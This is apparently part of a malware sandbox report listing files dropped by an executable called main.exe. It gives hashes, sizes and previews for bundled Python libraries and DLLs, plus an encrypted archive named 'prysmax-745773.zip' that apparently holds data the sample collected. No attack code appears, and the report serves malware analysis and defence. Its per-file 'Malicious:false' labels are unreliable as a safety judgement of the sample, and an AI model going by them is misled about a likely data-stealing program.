                                                                                                                                                                                                                                                                              SHA1:8E6689D37F82D5617B7F7F7232C94024D41066D1
                                                                                                                                                                                                                                                                              SHA-256:DB3F0246B1F9278F15845B99FEC478B8B506EB76487993722F8C6E254285FAF8
                                                                                                                                                                                                                                                                              SHA-512:C9F0870BC5D5EFF8769D9919E6D8DDE1B773543634F7D03503A9E8F191BD4ACC00A97E0399E173785D1B65318BAC79F41D3974AE6855E5C432AC5DACF8D13E8A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Copyright Jason R. Coombs..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTW

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\METADATA

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):6301
                                                                                                                                                                                                                                                                              Entropy (8bit):5.107162422517841
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:W4rkAIG0wRg8wbNDdq6T9927uoU/GBpHFwTZ:Sq0wRg8wbNDdBh927uoU/GBRFi
                                                                                                                                                                                                                                                                              MD5:9E59BD13BB75B38EB7962BF64AC30D6F
                                                                                                                                                                                                                                                                              SHA1:70F6A68B42695D1BFA55ACB63D8D3351352B2AAC
                                                                                                                                                                                                                                                                              SHA-256:80C7A3B78EA0DFF1F57855EE795E7D33842A0827AA1EF4EE17EC97172A80C892
                                                                                                                                                                                                                                                                              SHA-512:67AC61739692ECC249EBDC8F5E1089F68874DCD65365DB1C389FDD0CECE381591A30B99A2774B8CAAA00E104F3E35FF3745AFF6F5F0781289368398008537AE7
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: setuptools.Version: 65.5.0.Summary: Easily download, build, install, upgrade, and uninstall Python packages.Home-page: https://github.com/pypa/setuptools.Author: Python Packaging Authority.Author-email: distutils-sig@python.org.Project-URL: Documentation, https://setuptools.pypa.io/.Project-URL: Changelog, https://setuptools.pypa.io/en/stable/history.html.Keywords: CPAN PyPI distutils eggs package management.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: Topic :: System :: Systems Administration.Classifier: Topic :: Utilities.Requires-Python: >=3.7.License-File: LICENSE.Provides-Extra: certs.Provides-Extra: docs.Requi

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\RECORD

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):37694
                                                                                                                                                                                                                                                                              Entropy (8bit):5.555787611309118
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:vSzcBlShgRUhbul9nXJkpIVh498WjXYH0+5+E/8mrnaDoaQP7IOQRJqxBPgof2yd:vc853yQXYAY8AKCT9r2/GsIVxE9Im
                                                                                                                                                                                                                                                                              MD5:087F72A04BB085627494651E36C4C513
                                                                                                                                                                                                                                                                              SHA1:1E39070E246F91D8926268A033C6F584E629E2DE
                                                                                                                                                                                                                                                                              SHA-256:BFB77A968E06417BD37023BF1A2D7F1AAE9D8E74231665D6699D5BB82BDBD7B0
                                                                                                                                                                                                                                                                              SHA-512:39CE042A20324C6B63A192D70E56B36318C45D04B810A6BD333D1D40B6DAAD947AFB9156C003BC86C700A59F0F25753416D754DA06C808814920F92582CB6058
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:_distutils_hack/__init__.py,sha256=TSekhUW1fdE3rjU3b88ybSBkJxCEpIeWBob4cEuU3ko,6128.._distutils_hack/__pycache__/__init__.cpython-311.pyc,,.._distutils_hack/__pycache__/override.cpython-311.pyc,,.._distutils_hack/override.py,sha256=Eu_s-NF6VIZ4Cqd0tbbA5wtWky2IZPNd8et6GLt1mzo,44..distutils-precedence.pth,sha256=JjjOniUA5XKl4N5_rtZmHrVp0baW_LoHsN0iPaX10iQ,151..pkg_resources/__init__.py,sha256=fT5Y3P1tcSX8sJomClUU10WHeFmvqyNZM4UZHzdpAvg,108568..pkg_resources/__pycache__/__init__.cpython-311.pyc,,..pkg_resources/_vendor/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..pkg_resources/_vendor/__pycache__/__init__.cpython-311.pyc,,..pkg_resources/_vendor/__pycache__/appdirs.cpython-311.pyc,,..pkg_resources/_vendor/__pycache__/zipp.cpython-311.pyc,,..pkg_resources/_vendor/appdirs.py,sha256=MievUEuv3l_mQISH5SF0shDk_BNhHHzYiAPrT3ITN4I,24701..pkg_resources/_vendor/importlib_resources/__init__.py,sha256=evPm12kLgYqTm-pbzm60bOuumumT8IpBNWFp0uMyrzE,506..pkg_resources/_vendor/importli

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\WHEEL

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                                                                              Entropy (8bit):4.820827594031884
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlViZHKRRP+tPCCfA5S:RtBMwlViojWBBf
                                                                                                                                                                                                                                                                              MD5:4D57030133E279CEB6A8236264823DFD
                                                                                                                                                                                                                                                                              SHA1:0FDC3988857C560E55D6C36DCC56EE21A51C196D
                                                                                                                                                                                                                                                                              SHA-256:1B5E87E00DC87A84269CEAD8578B9E6462928E18A95F1F3373C9EEF451A5BCC0
                                                                                                                                                                                                                                                                              SHA-512:CD98F2A416AC1B13BA82AF073D0819C0EA7C095079143CAB83037D48E9A5450D410DC5CF6B6CFF3F719544EDF1C5F0C7E32E87B746F1C04FE56FAFD614B39826
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.37.1).Root-Is-Purelib: true.Tag: py3-none-any..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\entry_points.txt

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2740
                                                                                                                                                                                                                                                                              Entropy (8bit):4.540737240939103
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:lELcZDy3g6ySDsm90rZh2Phv4hhpTqTog:yLAP8arZoP94hTTqcg
                                                                                                                                                                                                                                                                              MD5:D3262B65DB35BFFAAC248075345A266C
                                                                                                                                                                                                                                                                              SHA1:93AD6FE5A696252B9DEF334D182432CDA2237D1D
                                                                                                                                                                                                                                                                              SHA-256:DEC880BB89189B5C9B1491C9EE8A2AA57E53016EF41A2B69F5D71D1C2FBB0453
                                                                                                                                                                                                                                                                              SHA-512:1726750B22A645F5537C20ADDF23E3D3BAD851CD4BDBA0F9666F9F6B0DC848F9919D7AF8AD8847BD4F18D0F8585DDE51AFBAE6A4CAD75008C3210D17241E0291
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[distutils.commands].alias = setuptools.command.alias:alias.bdist_egg = setuptools.command.bdist_egg:bdist_egg.bdist_rpm = setuptools.command.bdist_rpm:bdist_rpm.build = setuptools.command.build:build.build_clib = setuptools.command.build_clib:build_clib.build_ext = setuptools.command.build_ext:build_ext.build_py = setuptools.command.build_py:build_py.develop = setuptools.command.develop:develop.dist_info = setuptools.command.dist_info:dist_info.easy_install = setuptools.command.easy_install:easy_install.editable_wheel = setuptools.command.editable_wheel:editable_wheel.egg_info = setuptools.command.egg_info:egg_info.install = setuptools.command.install:install.install_egg_info = setuptools.command.install_egg_info:install_egg_info.install_lib = setuptools.command.install_lib:install_lib.install_scripts = setuptools.command.install_scripts:install_scripts.rotate = setuptools.command.rotate:rotate.saveopts = setuptools.command.saveopts:saveopts.sdist = setuptools.command.sdist:sdist.seto

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\top_level.txt

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                              Entropy (8bit):3.9115956018096876
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:3Wd+Nt8AfQYv:3Wd+Nttv
                                                                                                                                                                                                                                                                              MD5:789A691C859DEA4BB010D18728BAD148
                                                                                                                                                                                                                                                                              SHA1:AEF2CBCCC6A9A8F43E4E150E7FCF1D7B03F0E249
                                                                                                                                                                                                                                                                              SHA-256:77DC8BDFDBFF5BBAA62830D21FAB13E1B1348FF2ECD4CDCFD7AD4E1A076C9B88
                                                                                                                                                                                                                                                                              SHA-512:BC2F7CAAD486EB056CB9F68E6C040D448788C3210FF028397CD9AF1277D0051746CAE58EB172F9E73EA731A65B2076C6091C10BCB54D911A7B09767AA6279EF6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:_distutils_hack.pkg_resources.setuptools.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\sqlite3.dll

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1540888
                                                                                                                                                                                                                                                                              Entropy (8bit):6.5843112373819705
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24576:ozx+dvHgdXZW1s4gLLk56J0s3XyBh4mqWvqS/cm4ynZ3YSoXkMEKp:ApW1cd0s3CMmqWSS/ci3YSTk
                                                                                                                                                                                                                                                                              MD5:89C2845BD090082406649F337C0CCA62
                                                                                                                                                                                                                                                                              SHA1:956736454F9C9E1E3D629C87D2C330F0A4443AE9
                                                                                                                                                                                                                                                                              SHA-256:314BBA62F4A1628B986AFC94C09DC29CDAF08210EAE469440FBF46BCDB86D3FD
                                                                                                                                                                                                                                                                              SHA-512:1C467A7A3D325F0FEBB0C6A7F8F7CE49E4F9E3C4514E613352EF7705A338BE5E448C351A47DA2FB80BF5FC3D37DBD69E31C935E7FF58EAD06B2155A893728A82
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........l..l..l...B..l.....l.....l.....l.....l.....l..l..l.....l.....l......l.....l.Rich.l.................PE..d......f.........." ...&.....,......................................................S.....`..............................................#...........`..........h....T.../...p..\......T...............................@............@..X............................text....,.......................... ..`.rdata.......@.......2..............@..@.data...PM...0...D..................@....pdata..h............\..............@..@.rsrc........`.......:..............@..@.reloc..\....p.......D..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\unicodedata.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1140504
                                                                                                                                                                                                                                                                              Entropy (8bit):5.437116185038964
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12288:bdYbfjwR6nbYonRiPDjRrO5184EPYPx++ZiLKGZ5KXyVH4eD85U:RYbM10IDJcjEwPgPOG6Xyd4685U
                                                                                                                                                                                                                                                                              MD5:FD9132F966EE6D214E0076BF0492FB30
                                                                                                                                                                                                                                                                              SHA1:89B95957F002BF382435D015E26962A42032CB97
                                                                                                                                                                                                                                                                              SHA-256:37C68617FA02A2CADCED17EF724E2D450EF12A8A37215DA789A4679FDE1C5C02
                                                                                                                                                                                                                                                                              SHA-512:E35729ABC45E5561AAE1FB9E0E7C711DD7D3C1491520AA5C44FCC50C955F549F81D90897959327E930D02A5356AFE08D6195ADF002C87801A7A11235670639B5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........aM...#...#...#..x....#.."...#..&...#..'...#.. ...#..."...#..x"...#..."...#.......#...#...#......#...!...#.Rich..#.................PE..d...h..f.........." ...&.>..........<*....................................................`.............................................X...H........`.......P..T....8.../...p.......]..T............................[..@............P..x............................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data........0......................@....pdata..T....P.......$..............@..@.rsrc........`.......,..............@..@.reloc.......p.......6..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\win32\_win32sysloader.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):14848
                                                                                                                                                                                                                                                                              Entropy (8bit):5.113812591033072
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:rCm72PEO1jIUs0YqEcPbF55UgCWV4rofnDPdRD0hvHvcqvn7ycIt/G/:rardA0Bzx14r6nDrOhv+O/
                                                                                                                                                                                                                                                                              MD5:B58CA169FDCFFAB726391D3906DD9A4E
                                                                                                                                                                                                                                                                              SHA1:C4BB8DA84A5D9C31D0ACB7A4127F55E696F414DF
                                                                                                                                                                                                                                                                              SHA-256:1A8DCDBD730166889C03FAF285DC1DD9F16090DFE81043D80A9D6308300EBAC9
                                                                                                                                                                                                                                                                              SHA-512:AA23DEBF80D89A40677D1BF1C7C6C3445A79E76419865B86D0D6A605656478067EBEA2752348FCF77D583D2E5DCD284DA7F55F751D6441E647565DA77F982966
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Dg..%..%..%..]..%...P..%...]..%...P..%...P..%...P..%.....%..%..%..LP..%..LP..%..LP..%..Rich.%..................PE..d......g.........." ......................................................................`..........................................;..`...p;..d....p..t....`..................@...|2..T............................2..8............0..p............................text............................... ..`.rdata..4....0......................@..@.data........P......................@....pdata.......`.......0..............@..@.rsrc...t....p.......4..............@..@.reloc..@............8..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32api.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):133120
                                                                                                                                                                                                                                                                              Entropy (8bit):5.849201651779307
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:znvpE3JJ/Q7DspOCQUUU40Oc3lRVFhLaNzvBii7qQvmwCoY9LQPe:T4xG4pOCQUUU4rWlRVgv5qQSoY9
                                                                                                                                                                                                                                                                              MD5:D02300D803850C3B0681E16130FECEE4
                                                                                                                                                                                                                                                                              SHA1:6411815E2A908432A640719ECFE003B43BBBA35C
                                                                                                                                                                                                                                                                              SHA-256:B938C8CD68B15EC62F053045A764D8DD38162A75373B305B4CF1392AC05DF5F9
                                                                                                                                                                                                                                                                              SHA-512:6FAD1836614869AB3BB624BDA9943CEAF9E197B17CA4F4FFE78699492B72F95EEE02AE1BB07C0508438956BEF10CC1E656DDF75D0EDC9EF71A3860AF39075564
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..Vx...x...x...q...p...*..|...*..p...*..|......z.......z...*..o...3..s...x...-......z......y......y...Richx...........PE..d......g.........." .........................................................P............`.........................................P...............0..\....................@..X....v..T............................;..8............0.........@....................text............................... ..`.rdata..b....0......................@..@.data...X(......."..................@....pdata..............................@..@.rsrc...\....0......................@..@.reloc..X....@......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32trace.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):23552
                                                                                                                                                                                                                                                                              Entropy (8bit):5.281874510289411
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:9eeH8ZmV+zknwMswDuVQO0T8DmMel2/QEVR7AWCq5yn9ukF1B3:N+zi/uVQ1Q/QEVR1NUpB
                                                                                                                                                                                                                                                                              MD5:965E9833F4CD7A45C2C1EE85EFC2DA3B
                                                                                                                                                                                                                                                                              SHA1:3C6888194AD30E17DC5EEA7418133A541BCDDF07
                                                                                                                                                                                                                                                                              SHA-256:5ECD0274DC220312824BB3086B3E129E38A9DCB06913A2F6173A94DC256BF4C5
                                                                                                                                                                                                                                                                              SHA-512:F8C4E0C82A8229B3BDB897B536EE73B5D2A9A2810B73DCC77C880961A9A16E43746234A108A9A15BF18638FCFB3086E0F5EEFD85D5BF6F799718DC6F199C4A26
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(U.wF..wF..wF......wF...G..wF...C..wF...B..wF...E..wF.D.G..wF...G..wF...G..wF..wG..wF.D.O..wF.D.F..wF.D.D..wF.Rich.wF.................PE..d......g.........." .....,...,.......(....................................................`......................................... Q..T...tQ..........d....p.......................G..T...........................0H..8............@...............................text....*.......,.................. ..`.rdata.......@.......0..............@..@.data...(....`.......L..............@....pdata.......p.......R..............@..@.rsrc...d............V..............@..@.reloc...............Z..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\win32com\shell\shell.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):535040
                                                                                                                                                                                                                                                                              Entropy (8bit):6.1723495244729625
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12288:SBetHVSFgAXb3MWUF6w7FK3oHPl8eqTOU:SQkgAL3Md983C8eq
                                                                                                                                                                                                                                                                              MD5:43AA404015B0CEE369E941DC30B3F4B0
                                                                                                                                                                                                                                                                              SHA1:A34CBA0D08A17934D84B16FCFF5282367EAA08AA
                                                                                                                                                                                                                                                                              SHA-256:3FB83E9A14901321324F17D11DA50802B6777733E1EE0FD4F89DB0FD09C61690
                                                                                                                                                                                                                                                                              SHA-512:A8548F39F371B2389EEA45DA4248FFC015F5B243E957BD12B88661DB91D4D745A1CD1E772BDD6C739A87E69A88947FB58248BB394E1C5D21C0A9324EFC87724B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#t.wM'.wM'.wM'...'.wM'..L&.wM'..H&.wM'..I&.wM'..N&.wM'..I&.wM'..L&.wM'!.L&.wM'..K&.wM'..L&.wM'.wL'.wM'!.D&.wM'!.M&.wM'!.O&.wM'Rich.wM'........PE..d...}..g.........." .....2................................................................`.............................................L...<...........L....0..${..............h!......T...............................8............P..(............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data........P...`...(..............@....pdata..${...0...|..................@..@.rsrc...L...........................@..@.reloc..h!......."..................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\_cffi.cp311-win_amd64.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):650752
                                                                                                                                                                                                                                                                              Entropy (8bit):6.4073215909095005
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6144:rbTutDqcmbgSZZ/jZMaBHXD/OHHSAU1gIkpWCuMshv9K1HFV1jBjgG4LFxJY/1n:rfrcmsSHBHXiSArRENMivwF1jdgs/1n
                                                                                                                                                                                                                                                                              MD5:A19B5E6324D1A6A9FD99C98FE7B83FE2
                                                                                                                                                                                                                                                                              SHA1:4E3E56754A3C46C661EF591A4B5A5985BD4F6B85
                                                                                                                                                                                                                                                                              SHA-256:3ED00BB5876EAFA617BEBB213D2BC887B5637C53C4A849FCC2366084BF056787
                                                                                                                                                                                                                                                                              SHA-512:5975F90036CB7D3013FC6815F2C372EB9B89AF6C8153D1770EBBD70BF5B61E3B12DEFA3D7A4CCD364BD6A978B2879A15801D2AEC8BAD9221CA15DFFC9B7BA929
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................1....!X............!X.....!X.....!X......Z............_......_......_]....._.....Rich...........................PE..d...B'.f.........." ...(.....\...... ........................................0............`.........................................0...\........................3........... .......d..............................Pc..@...............@............................text...H........................... ..`.rdata..b...........................@..@.data...............................@....pdata...3.......4..................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\backend_c.cp311-win_amd64.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):519680
                                                                                                                                                                                                                                                                              Entropy (8bit):6.407145343537454
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12288:n5vDYEvt0Fwyow0k1rErp645rtxvi1gRNg5sXgz0:npBvt0Fw9fk1rErQ45rt5RNZ
                                                                                                                                                                                                                                                                              MD5:56DB4A861AEC914A860461DEDCDCA0A0
                                                                                                                                                                                                                                                                              SHA1:8535A8C9EAC371A54308795A8BBE89414933E035
                                                                                                                                                                                                                                                                              SHA-256:6AB611C4A24406D9D97F09D49D50142AB2734B69A2B0D9EA6489E4AF90C4A2A4
                                                                                                                                                                                                                                                                              SHA-512:600A21666E9ED334DE5B4B17F60136434EE485C80F9740E6085E24EF95CA5376E6223A54C6B1C8F12987EDAB5D89AF9676CC12E2A335F4C4E9AB79DFEF8E4B90
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................P.............P......P......P......R........4...W......W......Wn.....W.....Rich...........PE..d...<'.f.........." ...(............ ........................................0............`.............................................d...D....................)........... ..d...0\...............................Z..@...............(............................text...H........................... ..`.rdata..............................@..@.data....-.......(..................@....pdata...).......*..................@..@.rsrc...............................@..@.reloc..d.... ......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\gen_py\3.11\__init__.py

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                                                                                              Entropy (8bit):4.713840781302666
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:S3yE25MOWrYXtHVE/DRFrgm5/gvJgXDLAUDA+ERo6+aEYqVS1f6gq1WGgVSBn:S3mSOWWHVUDjrgmxgRgzLXDA6Va8VeuR
                                                                                                                                                                                                                                                                              MD5:8C7CA775CF482C6027B4A2D3DB0F6A31
                                                                                                                                                                                                                                                                              SHA1:E3596A87DD6E81BA7CF43B0E8E80DA5BC823EA1A
                                                                                                                                                                                                                                                                              SHA-256:52C72CF96B12AE74D84F6C049775DA045FAE47C007DC834CA4DAC607B6F518EA
                                                                                                                                                                                                                                                                              SHA-512:19C7D229723249885B125121B3CC86E8C571360C1FB7F2AF92B251E6354A297B4C2B9A28E708F2394CA58C35B20987F8B65D9BD6543370F063BBD59DB4A186AC
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:# Generated file - this directory may be deleted to reset the COM cache.....import win32com..if __path__[:-1] != win32com.__gen_path__: __path__.append(win32com.__gen_path__)..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\gen_py\3.11\dicts.dat

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):10
                                                                                                                                                                                                                                                                              Entropy (8bit):2.7219280948873625
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:qW6:qW6
                                                                                                                                                                                                                                                                              MD5:2C7344F3031A5107275CE84AED227411
                                                                                                                                                                                                                                                                              SHA1:68ACAD72A154CBE8B2D597655FF84FD31D57C43B
                                                                                                                                                                                                                                                                              SHA-256:83CDA9FECC9C008B22C0C8E58CBCBFA577A3EF8EE9B2F983ED4A8659596D5C11
                                                                                                                                                                                                                                                                              SHA-512:F58362C70A2017875D231831AE5868DF22D0017B00098A28AACB5753432E8C4267AA7CBF6C5680FEB2DC9B7ABADE5654C3651685167CC26AA208A9EB71528BB6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:..K....}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\prysmax-745773.zip

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):361555
                                                                                                                                                                                                                                                                              Entropy (8bit):7.997629529208548
                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                              SSDEEP:6144:Pb8kAtOnTdaHDQG4gcUEHExrc/M5F9S8DzFqk4fQLokLyfteo4RVcCymPiCpwhhF:jtEkZajQGLcrHExAMT9Bd54620o4bcDh
                                                                                                                                                                                                                                                                              MD5:0EB9EE8F67055D844D5DE8255E897C9D
                                                                                                                                                                                                                                                                              SHA1:AE8316659A1691B924ACA27D8C7AEDEAF8F91FC7
                                                                                                                                                                                                                                                                              SHA-256:D89BCE9C80D3A81A1D51845AF5932334573E0F9B8F896F6984E3E68CF6883C0F
